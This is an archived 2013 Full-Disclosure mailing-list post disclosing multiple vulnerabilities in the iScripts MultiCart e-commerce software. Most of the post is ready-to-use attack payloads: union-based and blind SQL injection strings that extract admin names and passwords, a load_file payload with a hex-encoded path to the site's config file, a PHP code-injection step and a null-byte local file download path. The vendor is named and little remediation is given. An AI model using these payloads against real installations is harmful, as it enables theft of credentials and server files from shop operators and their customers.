[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Iscripts multicart , multiple vulns

To: submissions@xxxxxxxxxxxxxxxxxxxxxxx, submit@xxxxxxxxxx, submit@xxxxxxxxxxx, submit@xxxxxxxxxxxxxx, vuldb@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Iscripts multicart , multiple vulns
From: 0u7 5m4r7 <n0p1337@xxxxxxxxx>
Date: Sun, 15 Dec 2013 00:59:13 +0200

Hi guys
i guess the coders don't care abt patching any of these vulns
so i may force them to do :)
publish this under the name of : i-Hmx
thanks

# Iscripts multicart
# Multiple vulnerabilities
# Author : i-Hmx
# n0p1337@xxxxxxxxx
# sec4ever.com

 - Vendor have been contacted since 2 years for more than 20 times and he don't 
give ashit @ all :/
 
I.Sql Injection Vulns

/getProductOptionDetailsAjax.php
For Table name > Post
product_option_id=i-Hmx'/*!1337union all select 1,(select distinct 
concat(0x3c62723e666172736177793c62723e3e3e,unhex(Hex(cast(table_name as 
char))),0x3c3c3c62723e) from information_schema.tables where 
table_schema=database() limit 52,1),2,3,4,5,6*/ and 'faris'='1337
Data
product_option_id=i-Hmx'/*!1337union all select 1,(select 
concat(0x3c62723e666172736177793c62723e3e3e,admin_name,0x3a,admin_password,0x3c3c3c62723e)
 from fasettings) ,2,3,4,5,6*/ and 'faris'='1337

II.Blind Sql Injection vulns
/product_review.php
if($_SESSION["sess_userid"]!="")
{
        
$pid = ($_GET['pid']!='')?$_GET['pid']:$_POST['pid'];

        
//checking already review exists or not
        
$psql=mysql_query("select vDes from ".$tableprefix."Review where 
nUserId='".$_SESSION["sess_userid"]."' and nProdId='".$pid."'") or 
die(mysql_error());
        
if(mysql_num_rows($psql)>0)
        
{

Post : pid=%Inject_Here%

/product_review_lists.php
Same

/rpc.php
type=%Inject_Here%

III-Union based Sql Injection
/admin/list_meta_tags.php
Post : meataid=fa' union all select 1,(select 
concat(admin_name,0x3a,admin_password) from mul_settings),3,4,5 and '1'='1
Post : meataid=fa' union all select 1,(select version() ),3,4,5 and '1'='1
meataid=fa' union all select 
1,load_file(0x433a5c417070536572765c7777775c6c61625c6d756c746963617274322e345c696e636c756465735c636f6e6669672e706870),3,4,5
 and '1'='1
VI.PHP Code Injection
/response.php
Post : HTTP_RAW_POST_DATA=Code
File found at : csv/test77.txt
Include it via

V.LFD > for file inside csv directory < need dev >
/includes/download.php?f=f.php%00.csv

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] iscripts autohoster , multiple vulns / php code injection exploit
Next by Date: [Full-disclosure] Iscripts supportdesk 4.x , Multiple vulns / Sql injection exploit
Previous by thread: [Full-disclosure] iscripts autohoster , multiple vulns / php code injection exploit
Next by thread: [Full-disclosure] Iscripts supportdesk 4.x , Multiple vulns / Sql injection exploit
Index(es):
- Date
- Thread